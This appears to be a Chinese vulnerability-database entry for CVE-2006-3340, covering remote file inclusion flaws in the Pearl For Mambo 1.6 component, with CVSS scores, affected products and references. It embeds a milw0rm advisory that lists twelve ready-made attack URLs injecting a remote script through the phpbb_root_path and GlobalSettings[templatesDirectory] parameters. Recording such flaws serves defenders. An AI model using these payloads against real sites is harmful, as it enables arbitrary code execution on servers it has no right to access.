CVE-2006-3340
CVSS5.1
发布时间 :2006-07-03 14:05:00
修订时间 :2011-03-07 21:38:23
NMCOE    

[原文]Multiple PHP remote file inclusion vulnerabilities in Pearl For Mambo module 1.6 for Mambo, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via the (1) phpbb_root_path parameter in (a) includes/functions_cms.php and the (2) GlobalSettings[templatesDirectory] parameter in multiple files in the "includes" directory including (b) adminSensored.php, (c) adminBoards.php, (d) adminAttachments.php, (e) adminAvatars.php, (f) adminBackupdatabase.php, (g) adminBanned.php, (h) adminForums.php, (i) adminPolls.php, (j) adminSmileys.php, (k) poll.php, and (l) move.php.


[CNNVD]Pearl For Mambo多个远程文件包含漏洞(CNNVD-200607-004)

        Mambo是免费的功能强大的开放源码内容管理系统,Pearl For Mambo是可以无缝的集成于Mambo的一个组件。
        Pearl For Mambo允许远程攻击者使用phpbb_root_path或GlobalSettings[templatesDirectory]参数向多个脚本发送特制的URL请求,导致指定远程系统的恶意文件,在有漏洞的系统上执行任意代码。
        以下脚本受这个漏洞影响:
        includes/functions_cms.php
        includes/adminSensored.php
        includes/adminBoards.php
        includes/adminAttachments.php
        includes/adminAvatars.php
        includes/adminBackupdatabase.php
        includes/adminBanned.php
        includes/adminForums.php
        includes/adminPolls.php
        includes/adminSmileys.php
        includes/poll.php
        includes/move.php
        
        

- CVSS (基础分值)

CVSS分值: 5.1 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:pearlinger:pearl_for_mambo:1.6
cpe:/a:pearlinger:pearl_for_mambo:1.5

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3340
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3340
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200607-004
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2006/2561
(UNKNOWN)  VUPEN  ADV-2006-2561
http://www.securityfocus.com/bid/18690
(UNKNOWN)  BID  18690
http://secunia.com/advisories/20819
(VENDOR_ADVISORY)  SECUNIA  20819
http://milw0rm.com/exploits/1956
(UNKNOWN)  MILW0RM  1956
http://www.osvdb.org/27178
(UNKNOWN)  OSVDB  27178
http://www.osvdb.org/27177
(UNKNOWN)  OSVDB  27177
http://www.osvdb.org/27176
(UNKNOWN)  OSVDB  27176
http://www.osvdb.org/27175
(UNKNOWN)  OSVDB  27175
http://www.osvdb.org/27174
(UNKNOWN)  OSVDB  27174
http://www.osvdb.org/27173
(UNKNOWN)  OSVDB  27173
http://www.osvdb.org/27172
(UNKNOWN)  OSVDB  27172
http://www.osvdb.org/27171
(UNKNOWN)  OSVDB  27171
http://www.osvdb.org/27170
(UNKNOWN)  OSVDB  27170
http://www.osvdb.org/27169
(UNKNOWN)  OSVDB  27169
http://www.osvdb.org/27168
(UNKNOWN)  OSVDB  27168

- 漏洞信息

Pearl For Mambo多个远程文件包含漏洞
中危 输入验证
2006-07-03 00:00:00 2006-07-05 00:00:00
远程  
        Mambo是免费的功能强大的开放源码内容管理系统,Pearl For Mambo是可以无缝的集成于Mambo的一个组件。
        Pearl For Mambo允许远程攻击者使用phpbb_root_path或GlobalSettings[templatesDirectory]参数向多个脚本发送特制的URL请求,导致指定远程系统的恶意文件,在有漏洞的系统上执行任意代码。
        以下脚本受这个漏洞影响:
        includes/functions_cms.php
        includes/adminSensored.php
        includes/adminBoards.php
        includes/adminAttachments.php
        includes/adminAvatars.php
        includes/adminBackupdatabase.php
        includes/adminBanned.php
        includes/adminForums.php
        includes/adminPolls.php
        includes/adminSmileys.php
        includes/poll.php
        includes/move.php
        
        

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://www.pearlinger.com/

- 漏洞信息 (1956)

Pearl For Mambo <= 1.6 Multiple Remote File Include Vulnerabilities (EDBID:1956)
php webapps
2006-06-27 Verified
0 Kw3[R]Ln
N/A [点击下载]
--------------------------------------------------------------------------- 
Pearl For Mambo <= 1.6 (GlobalSettings[templatesDirectory]) Remote File Include Vulnerabilities
---------------------------------------------------------------------------

Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://RoSecurityGroup.net :
Remote : Yes
Critical Level : Dangerous

---------------------------------------------------------------------------
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Pearl For Mambo 
version : latest version [ 1.6 ]
Description: component for mambo
URL : http://www.pearlinger.com

------------------------------------------------------------------
Exploit:
~~~~~~~

Variable $GlobalSettings[templatesDirectory] not sanitized.When register_globals=on an attacker can exploit this vulnerability with a simple php injection script.


# http://www.site.com/[path]/includes/functions_cms.php?phpbb_root_path=[evil_script] 
# http://www.site.com/[path]/includes/adminSensored.php?GlobalSettings[templatesDirectory]=[evil_script]
# http://www.site.com/[path]/includes/adminBoards.php?GlobalSettings[templatesDirectory]=[evil_script]
# http://www.site.com/[path]/includes/adminAttachments.php?GlobalSettings[templatesDirectory]=[evil_script]
# http://www.site.com/[path]/includes/adminAvatars.php?GlobalSettings[templatesDirectory]=[evil_script]
# http://www.site.com/[path]/includes/adminBackupdatabase.php?GlobalSettings[templatesDirectory]=[evil_script]
# http://www.site.com/[path]/includes/adminBanned.php?GlobalSettings[templatesDirectory]=[evil_script]
# http://www.site.com/[path]/includes/adminForums.php?GlobalSettings[templatesDirectory]=[evil_script]
# http://www.site.com/[path]/includes/adminPolls.php?GlobalSettings[templatesDirectory]=[evil_script]
# http://www.site.com/[path]/includes/adminSmileys.php?GlobalSettings[templatesDirectory]=[evil_script]
# http://www.site.com/[path]/includes/poll.php?GlobalSettings[templatesDirectory]=[evil_script]
# http://www.site.com/[path]/includes/move.php?GlobalSettings[templatesDirectory]=[evil_script]


---------------------------------------------------------------------------

Solution :
~~~~~~~~~

declare variabel $[evil_script]
---------------------------------------------------------------------------


Shoutz:
~~~~~

# Special greetz to my good friend [Oo]
# To all members of h4cky0u.org ;) and Romanian Security Team [ hTTp://RoSecurityGroup.net ]
---------------------------------------------------------------------------

*/

Contact:
~~~~~~~

Nick: Kw3rLn
E-mail: ciriboflacs[at]YaHoo[dot]Com
Homepage: hTTp://RoSecurityGroup.net
/*

-------------------------------- [ EOF] ----------------------------------

# milw0rm.com [2006-06-27]
		

- 漏洞信息

27168
Pearlinger Multiple Products functions_cms.php phpbb_root_path Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Multiple Pearlinger.com products contain a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the includes/functions_cms.php script not properly sanitizing user input supplied to the 'phpbb_root_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

- 时间线

2006-06-27 Unknow
2006-06-27 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站